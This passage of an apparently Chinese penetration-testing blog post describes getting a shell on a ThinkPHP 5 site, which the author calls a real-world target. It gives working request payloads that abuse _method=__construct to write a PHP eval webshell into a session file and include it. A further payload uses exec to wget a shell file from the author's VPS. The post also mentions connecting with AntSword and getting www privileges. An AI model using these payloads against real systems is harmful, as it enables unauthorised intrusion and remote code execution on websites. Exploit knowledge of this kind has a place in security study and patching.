_method=__construct&filter[
=think\\Session::set&method=get&get[
=<?php eval($_POST['c'
)?>&server[
=1


然后直接利用文件包含去包含session文件 ， tp5的session文件一般都是在/tmp下面 ， 文件名为sess_sessionid（这个sessionod在Cookie里面）
_method=__construct&method=get&filter[
=think\\__include_file&server[
=phpinfo&get[
=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoi&c=phpinfo();


成功执行 ， 接下来通过蚁剑连接即可

成功getshell

www权限

方法五上面拿到了shell ， 但是我还是再尝试了是否还有其他方法能getshell的 。 看到一篇文章 ， 是由于disable_function中没有禁用exec ， 然后利用exec从vps下载shell文件 。
于是我仔细看了下disable_function中禁用的函数 ， 巧了 ， 发现也没有禁用exec ， 那么试一下
首先在vps上创建一个test.php ， 并用python开放一个端口
python -m SimpleHTTPServer 8888


从vps上下载文件
s=wget vps/test.php&_method=__construct&method=get&filter[
=exec


成功下载到目标机器上
最后实战是比较好的学习方法 ， 通过对这个战点的渗透 ， 才知道tp5的站有挺多种方法的 ， 也学到了之前没有使用过的session包含 。 本次实战不仅仅为了getshell ， 也是为了学习利用tp5的不同的getshell方法 。
关注我 ， 持续更新——私我获取【网络安全学习资料·攻略】

• 凯帕|德布劳内任意球打门，凯帕扑出皮球
• 分成|YY直播：2021年公会和主播分成超50亿
• 凌晨，南京市雨花台区地震！
• gtx1060|GTX1060上古神器？
• 微信上线“语音暂停”功能
• 《吉星高照》的谢怜杀青啦，半年的拍摄
• 封顶|雄安新区：城市计算（超算云）中心提前完成主体结构封顶
• |既能打造你的品牌又能促进销售的广告宣传方法？
• 【e汽车】做更懂你的智能出行伙伴 魏牌举办用户粉丝节
• 年货|华硕破晓Pro14 年货节是低价格4299元